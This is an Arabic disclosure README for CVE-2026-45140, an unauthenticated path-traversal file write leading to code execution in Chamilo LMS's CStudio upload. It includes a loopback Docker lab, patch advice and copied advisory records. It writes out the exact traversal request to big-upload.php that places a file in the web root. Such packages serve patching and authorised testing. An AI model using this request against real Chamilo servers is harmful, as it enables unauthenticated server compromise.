
حزمة إفصاح ونص PoC للثغرة CVE-2026-45140، وهي ثغرة اجتياز مسار وتنفيذ أوامر عن بُعد (RCE) دون مصادقة في رفع CStudio بنظام Chamilo LMS، مع مختبر Docker loopback وإرشادات الترقيع.
abraxaslabs.tech · github.com/abraxas · @abraxas_null · CVE-2026-45140
Chamilo LMS 2.0.0 — chamilo
Chamilo LMS هو نظام إدارة تعلم مفتوح المصدر. قبل الإصدار 2.0.1، يسمح Chamilo LMS لمهاجم بعيد غير مُصادَق عليه بتنفيذ تعليمات برمجية عشوائية على الخادم. لا يحدد الإشعار الرسمي نقطة النهاية أو المكوّن أو المدخل أو آلية الاستغلال المتأثرة. تم إصلاح هذه المشكلة في الإصدار 2.0.1.
| CVE | CVE-2026-45140 · CVE.org |
| CWE | CWE-22, CWE-94, CWE-219, CWE-434 |
| CVSS | حرج: 9.8 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| المنتج | Chamilo LMS |
| المتأثر | جميع الإصدارات حتى 2.0.0 (شاملة) |
| المُرقَّع | 2.0.1 وما بعده |
| المصادقة | لا شيء (انظر خريطة المصدر) |
| الترخيص | GNU Affero GPL v3.0 |
| المختبر | 127.0.0.1 فقط · حزمة إفصاح للمورّد/العميل، وليست ماسحًا ضوئيًا |
رفع CStudio هو ملف PHP باسم big-upload.php، وليس إجراء Symfony action=. HTTP هو مسار الإضافة هذا.
POST/plugin/CStudio/editor/import-project/inc/big-upload.php?action=upload&key=../../../../public/poc-witness.txtPOST /plugin/CStudio/editor/import-project/inc/big-upload.php?action=upload&key=../../../../public/poc-witness.txt body=POCWitness45140BigUpload::setTempName(key) + uploadFile() fopen(cache/cstudio_upload/ + key)GET /poc-witness.txt → POCWitness45140يحتوي جسم GET /poc-witness.txt على POCWitness45140. صفحة HTML الرئيسية أو إعادة توجيه التثبيت ليست شاهد كتابة الملف.
افعل هذا أولًا: حدّث Chamilo LMS إلى 2.0.1 أو أحدث.
تحقق بعد الترقية
CVE-2026-45140-Abraxas-Labs.py مقابل البناء المُرقَّع: يجب ألا يظهر الشاهد المُعيَّن.إذا لم تتمكن من التحديث فورًا
استهدف فقط http://127.0.0.1:8088 (أو عنوان loopback الذي ربطته). لا توجّه هذا السكربت إلى الإنترنت.
python3 CVE-2026-45140-Abraxas-Labs.py
النجاح هو الشاهد المذكور أعلاه في جسم الاستجابة. صفحة HTML عامة بحالة 200 ليست كذلك.
حزمة loopback المستخدمة لإعادة الإنتاج. صور رسمية ما لم يكن هناك Dockerfile في هذا المجلد يبني من المصدر.
cd lab
docker compose up --force-recreate
اربط شجرة المنتج المتأثر بجانب Compose إذا كان ملف YAML يربط دليلًا محليًا (ملف zip للإضافة / وسم المصدر من جدول الإصدارات). لا تنشر شيئًا باستثناء 127.0.0.1.
# CVE-2026-45140 (structured records)
- input: `https://nvd.nist.gov/vuln/detail/CVE-2026-45140`
- CWE: CWE-22, CWE-94, CWE-219, CWE-434
- published: 2026-09-17T21:17:12.440
## NVD description
Chamilo LMS is an open-source learning management system. Prior to 2.0.1, Chamilo LMS allows an unauthenticated remote attacker to execute arbitrary code on the server. The authoritative advisory does not identify the affected endpoint, component, input, or exploitation mechanism. This issue is fixed in version 2.0.1.
## MITRE description
Chamilo LMS is an open-source learning management system. Prior to 2.0.1, Chamilo LMS allows an unauthenticated remote attacker to execute arbitrary code on the server. The authoritative advisory does not identify the affected endpoint, component, input, or exploitation mechanism. This issue is fixed in version 2.0.1.
## Affected
- chamilo chamilo-lms < 2.0.1 affected
- OSV:
## References (JSON sources only)
- https://github.com/chamilo/chamilo-lms/commit/4bdba1b9a8820bd70c0809317775d7f6eaa79844
- https://github.com/chamilo/chamilo-lms/releases/tag/v2.0.1
- https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-g4c3-4g96-6g4m
- https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/45xxx/CVE-2026-45140.json
- https://nvd.nist.gov/vuln/detail/CVE-2026-45140
- https://github.com/advisories/GHSA-g4c3-4g96-6g4m
## GitHub advisory
Chamilo LMS CStudio upload flow allows unauthenticated remote code execution
### Impact
Ability to run arbitrary code on the server without authentication.
## OSV
Chamilo LMS CStudio upload flow allows unauthenticated remote code execution
Chamilo LMS is an open-source learning management system. Prior to 2.0.1, Chamilo LMS allows an unauthenticated remote attacker to execute arbitrary code on the server. The authoritative advisory does not identify the affected endpoint, component, input, or exploitation mechanism. This issue is fixed in version 2.0.1.
حزمة الإفصاح هذه مرخّصة بموجب GNU Affero General Public License v3.0. انظر LICENSE.
هذه الحزمة مخصّصة للمورّد، ومالك الموقع، والمختبرات المُصرَّح لها. يتواصل السكربت مع 127.0.0.1. استخدامه ضد أنظمة لا تملكها غير مُصرَّح به من Abraxas Labs. لا ضمان.